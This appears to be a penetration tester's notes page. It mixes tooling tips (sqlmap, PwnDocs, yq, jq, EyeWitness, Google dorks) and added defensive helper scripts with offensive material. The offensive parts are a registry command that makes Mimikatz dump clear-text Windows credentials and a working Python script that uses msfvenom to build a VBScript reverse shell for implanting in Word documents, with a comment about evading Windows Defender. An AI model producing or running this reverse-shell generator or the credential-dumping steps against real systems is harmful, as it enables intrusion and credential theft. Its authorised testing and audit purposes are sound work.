Deliberately Show Clear-text Credentials in Mimikatz Output
For demonstration purposes, you might want to show the clear-text passwords in Mimikatz output.
Step 1) Run the command below as Administrator on the victim machine
reg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0x00000001
Step 2) Restart the victim machine
Step 3) Run mimikatz, get clear-text credentials.
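The value that Step 1 sets, UseLogonCredential = 1, is also the thing a defender looks for: it tells LSASS to keep WDigest clear-text credentials in memory, which is why Mimikatz can print them afterwards. The script below is an added example (not from the original post) that classifies a host from the text `reg query` prints for that key and, where the value is 1, returns the `reg add` that reverts it to 0. The sample outputs are constructed, not captured from a real machine; only the `UseLogonCredential` line is relied on. The treatment of an absent value follows the documented default: Windows 8.1 / Server 2012 R2 and later (and older systems with KB2871997) do not keep the credentials unless the value is explicitly 1. Changes to this value are also visible in Sysmon event 13 or, with a SACL on the key, Windows event 4657.

```python
import re
from typing import Optional

# Registry key the post's `reg add` modifies.
WDIGEST_KEY = r"HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest"

# One value line of `reg query` output, e.g. "    UseLogonCredential    REG_DWORD    0x1"
VALUE_LINE = re.compile(
    r"^\s*UseLogonCredential\s+REG_DWORD\s+(0x[0-9A-Fa-f]+|\d+)\s*$", re.MULTILINE
)


def wdigest_status(reg_query_output: str) -> str:
    """Classify a host from the text `reg query <WDIGEST_KEY>` printed.

    'cleartext-enabled': value 1, LSASS keeps WDigest clear-text passwords
                         (what the post's command turns on).
    'disabled':          value 0.
    'not-set':           value absent; Windows 8.1 / Server 2012 R2 and later,
                         and older versions with KB2871997, behave as disabled.
    """
    match = VALUE_LINE.search(reg_query_output)
    if match is None:
        return "not-set"
    raw = match.group(1)
    value = int(raw, 16) if raw.lower().startswith("0x") else int(raw)
    return "cleartext-enabled" if value == 1 else "disabled"


def remediation_command(status: str) -> Optional[str]:
    """Return the reg command that sets the value back to 0, or None if nothing to do."""
    if status != "cleartext-enabled":
        return None
    return f"reg add {WDIGEST_KEY} /v UseLogonCredential /t REG_DWORD /d 0 /f"


# Constructed sample outputs (not captured from a real host); the extra value
# lines are only there so the parser has to find the right one.
SAMPLE_ENABLED = r"""
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest
    Negotiate    REG_DWORD    0x0
    UTF8HTTP    REG_DWORD    0x1
    UseLogonCredential    REG_DWORD    0x1
"""
SAMPLE_DISABLED = SAMPLE_ENABLED.replace(
    "UseLogonCredential    REG_DWORD    0x1", "UseLogonCredential    REG_DWORD    0x0"
)
SAMPLE_ABSENT = "\n".join(
    line for line in SAMPLE_ENABLED.splitlines() if "UseLogonCredential" not in line
)

if __name__ == "__main__":
    for name, sample in (("enabled", SAMPLE_ENABLED),
                         ("disabled", SAMPLE_DISABLED),
                         ("absent", SAMPLE_ABSENT)):
        status = wdigest_status(sample)
        print(f"{name}: {status}  fix: {remediation_command(status)}")
```

Feed it the saved output of `reg query HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest` from each host you want to audit; anything reported as `cleartext-enabled` after a demo like the one above should be reverted with the returned command and rebooted, since LSASS only picks the setting up at logon.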
VBScript Python Script
```python
# This Python script can be used to generate VBScript reverse shell to be implanted in Word documents
# Problem is, Windows defender detects the VBScript as malicious, so I need to find a way to obfuscate further
import subprocess

# Get input for IP Address and listening port
ipaddress = input("Input listening IP Address: ")
lport = input("Input listening port: ")

# Run msfvenom to get a reverse shell VBScript
command1 = [
    'msfvenom', '-p', 'windows/shell_reverse_tcp',
    f'LHOST={ipaddress}', f'LPORT={lport}',
    '-f', 'hta-psh', '-o', '/tmp/rev.hta'
]
subprocess.run(command1)

# Read the content of /tmp/rev.hta, cut it, and grep it
output = ''  # stays empty if the pipeline below fails
try:
    cat_command = subprocess.Popen(['cat', '/tmp/rev.hta'], stdout=subprocess.PIPE)
    cut_command = subprocess.Popen(['cut', '-d', '"', '-f', '2'],
                                   stdin=cat_command.stdout, stdout=subprocess.PIPE)
    grep_command = subprocess.Popen(['grep', 'powershell.exe -nop'],
                                    stdin=cut_command.stdout, stdout=subprocess.PIPE)
    # Get the output of the last command in the pipeline
    output = grep_command.communicate()[0].decode('utf-8')
except (OSError, subprocess.CalledProcessError) as e:  # OSError: a binary in the pipeline is missing
    print("Error running the commands:", e)

# Prepare /home/kali/Desktop/reverseshell.vbscript
try:
    with open('/home/kali/Desktop/reverseshell.vbscript', 'a') as g:
        g.write('Dim Str As String\n')
    print('\nreverseshell.vbscript successfully created on /home/kali/Desktop/')
except FileNotFoundError:
    print("Error at beginning of script")

# Cut the output of the vbscript to 50 characters per line
# Then input into /home/kali/Desktop/reverseshell.vbscript
n = 50
for i in range(0, len(output), n):
    try:
        # the with-block closes the file; no explicit close() needed
        with open('/home/kali/Desktop/reverseshell.vbscript', 'a') as f:
            f.write("Str = Str + " + '"' + output[i:i+n] + '"' + '\n')
    except FileNotFoundError:
        print("The directory does not exist")

# Close off reverseshell.vbscript
try:
    with open('/home/kali/Desktop/reverseshell.vbscript', 'a') as g:
        g.write('\nCreateObject("Wscript.Shell").Run Str')
except FileNotFoundError:
    print("Error at end of script")

# Delete /tmp/rev.hta
command2 = ['rm', '/tmp/rev.hta']
subprocess.run(command2)

# Print completion status
print('\nScript complete, please cat /home/kali/Desktop/reverseshell.vbscript')
```
sqlmap POST request
- Intercept a POST request in Burp Suite > right click > Copy to File
- sqlmap -r <filename> -p <parameter to test> --proxy=http://127.0.0.1:8080 --batch
PwnDocs Troubleshooting
- Recompile PwnDocs docker after making changes to javascript
sudo docker-compose down
sudo docker-compose up -d --build
- Troubleshoot errors in PwnDocs
sudo docker container ls
sudo docker container logs <CONTAINER ID>
Installing PwnDocs in Kali
sudo git clone https://github.com/pwndoc/pwndoc.git
sudo apt-get install docker
sudo apt install docker.io
sudo apt-get install npm
sudo apt install docker-compose
sudo mousepad pwndoc/frontend/Dockerfile
Replace "FROM node:lts-alpine AS build" with "FROM node:16-alpine AS build"
cd pwndoc
sudo docker-compose up -d --build
sudo docker-compose start
Access https://localhost:8443 via web browser
Using yq
yq is a YAML processor that can also be used to convert JSON files to YAML
Install into Kali using the following steps
sudo wget https://github.com/mikefarah/yq/releases/download/{version}/yq_linux_amd64 -O /usr/bin/yq
sudo chmod +x /usr/bin/yq
![](https://benleeyr.wordpress.com/wp-content/uploads/2023/01/image-3.png?w=457)
Convert from JSON to YAML using the following command
yq -P file.json
Using jq
jq is used to filter and manipulate JSON files
Install using sudo apt-get install jq
First, ensure that the JSON file starts with something like so:
![](https://benleeyr.wordpress.com/wp-content/uploads/2023/01/image-1.png?w=529)
To pull out specific content, use the following command
cat file.json | jq -r '.test[] | .a + "\n" + .ac + "\n" + .affected_hosts + "\n" + .affected_users + "\n"'
If a field is a number, jq refuses to concatenate it with a string; convert it with tostring first:
cat file.json | jq -r '.test[] | .a + "\n" + .ac + "\n" + .affected_hosts + "\n" + (.affected_users|tostring) + "\n"'
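The two jq commands above differ only in how a numeric field is handled, and the difference is easy to hit when a report exports `affected_users` as a count. The script below is an added example (not from the original post) that reproduces the filter's logic in Python over a constructed JSON document of the shape `.test[]` expects, a top-level `test` array of objects: with `tostring=False` it fails on the numeric field the same way the first jq filter does, and with `tostring=True` it applies the `tostring` fix. The field names `a`, `ac`, `affected_hosts` and `affected_users` are the ones from the post; the values are made up.

```python
import json
from typing import List

# Fields in the order the post's jq filter prints them.
FIELDS = ("a", "ac", "affected_hosts", "affected_users")

# Constructed sample document.  The second record carries affected_users as a
# number, which is the case the (.affected_users|tostring) variant exists for.
SAMPLE_JSON = """{
  "test": [
    {"a": "SQL injection", "ac": "High", "affected_hosts": "app.example.com", "affected_users": "3"},
    {"a": "Reflected XSS", "ac": "Medium", "affected_hosts": "shop.example.com", "affected_users": 42}
  ]
}"""


def render_report(json_text: str, tostring: bool = False) -> List[str]:
    """Python stand-in for:  jq -r '.test[] | .a + "\\n" + .ac + ... + "\\n"'

    tostring=False mirrors the first filter: jq will not add a string and a
    number, and this raises TypeError in the same situation.
    tostring=True mirrors the (.affected_users|tostring) fix: non-string
    values are rendered as their JSON text before concatenation.
    Returns one string per record, each ending with a newline as the filter does.
    """
    lines = []
    for record in json.loads(json_text)["test"]:
        parts = []
        for field in FIELDS:
            value = record[field]
            if not isinstance(value, str):
                if not tostring:
                    raise TypeError(f"field {field!r} is {type(value).__name__}, not string")
                value = json.dumps(value)  # what jq's tostring does for a number
            parts.append(value)
        lines.append("\n".join(parts) + "\n")
    return lines


def fails_without_tostring(json_text: str) -> bool:
    """True when the plain filter would error on this input, i.e. tostring is needed."""
    try:
        render_report(json_text, tostring=False)
        return False
    except TypeError:
        return True


if __name__ == "__main__":
    print("needs tostring:", fails_without_tostring(SAMPLE_JSON))
    for block in render_report(SAMPLE_JSON, tostring=True):
        print(block)
```

Running the check first on an export tells you whether the plain filter will work or whether you need the `tostring` form, without waiting for jq to stop halfway through a large file.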
Website Accessibility Hunting
- Download EyeWitness
- git clone https://github.com/FortyNorthSecurity/EyeWitness
- cd EyeWitness/Python
- Get list of URLs via crt.sh
- sudo dnsrecon --iw -d DOMAIN -t crt | grep "DOMAIN" | cut -d ' ' -f 4 | sort -u > list.txt
- Inspect list.txt for non-required entries and remove them manually (to improve with sed next time)
- Use EyeWitness to scan sites from list.txt, then output to /home/kali/Desktop/DOMAIN/eyewitness/
- ./EyeWitness.py --web -f /home/kali/Desktop/BugBounty/DOMAIN/hosts.txt --user-agent "vdptest" --prepend-https -d /home/kali/Desktop/BugBounty/DOMAIN/urls_eyewitness
- Press “Y” to view the report when prompted
Note if copy pasting commands:
Retype --iw, as the two hyphens get combined into one long dash (–)
Retype " and ' as they do not paste correctly
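The manual clean-up step above (removing unwanted entries from list.txt before handing it to EyeWitness) is the part the post says it wants to automate. The script below is an added example (not from the original post) that does that clean-up in Python: it reproduces the `grep | cut -d ' ' -f 4 | sort -u` pipeline and then drops the entries that usually need removing by hand, namely wildcard names, names that only contain the domain as a substring (which the `grep` keeps), and tokens that are not valid hostnames. The sample lines are constructed and only mirror the one thing the pipeline relies on, the hostname being the fourth space-separated field; they are not real dnsrecon output.

```python
import re
from typing import List

# Syntactic hostname check: dot-separated labels of letters, digits and hyphens.
HOSTNAME = re.compile(r"^(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9-]+$")

# Constructed sample lines (not real dnsrecon output).  They only keep the
# layout the post's pipeline depends on: hostname in field 4 of cut -d ' '.
SAMPLE_DNSRECON = (
    "[*] Performing Crt.sh search\n"
    "[*] \t A www.example.com 203.0.113.10\n"
    "[*] \t A www.example.com 203.0.113.10\n"
    "[*] \t A *.example.com\n"
    "[*] \t A API.Example.com 203.0.113.30\n"
    "[*] \t A example.com.lookalike.test 198.51.100.5\n"
    "[*] \t A staging.example.com 203.0.113.20\n"
    "[*] \t A bad_host.example.com 203.0.113.40\n"
)


def clean_hosts(dnsrecon_output: str, domain: str) -> List[str]:
    """`grep DOMAIN | cut -d ' ' -f 4 | sort -u` plus the manual clean-up.

    Dropped: wildcard names (*.example.com is not a scannable host), names
    that merely contain the domain somewhere (grep keeps those), and tokens
    that are not syntactically valid hostnames.  Kept names are lower-cased,
    deduplicated and sorted, ready for EyeWitness -f.
    """
    domain = domain.lower().strip(".")
    kept = set()
    for line in dnsrecon_output.splitlines():
        fields = line.split(" ")  # same splitting rule as cut -d ' '
        if len(fields) < 4:
            continue
        host = fields[3].lower().rstrip(".")
        if host.startswith("*."):
            continue
        if host != domain and not host.endswith("." + domain):
            continue
        if not HOSTNAME.match(host):
            continue
        kept.add(host)
    return sorted(kept)


def write_list(hosts: List[str], path: str) -> int:
    """Write one host per line (the format EyeWitness -f reads); returns the count."""
    with open(path, "w") as fh:
        for host in hosts:
            fh.write(host + "\n")
    return len(hosts)


if __name__ == "__main__":
    hosts = clean_hosts(SAMPLE_DNSRECON, "example.com")
    print("\n".join(hosts))
    print(write_list(hosts, "list.txt"), "hosts written to list.txt")
```

Pipe the saved dnsrecon output through `clean_hosts` with the domain you are authorised to test and write the result with `write_list`; the in-scope check (`host == domain or host.endswith("." + domain)`) is the line to adjust if the programme's scope lists several domains.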
Google Dorks Tips
site: to restrict results to that specific site
inurl: to return only results that have that text in the URL
filetype: to return only results with the specified file type
-inurl: to exclude results that have that text in the URL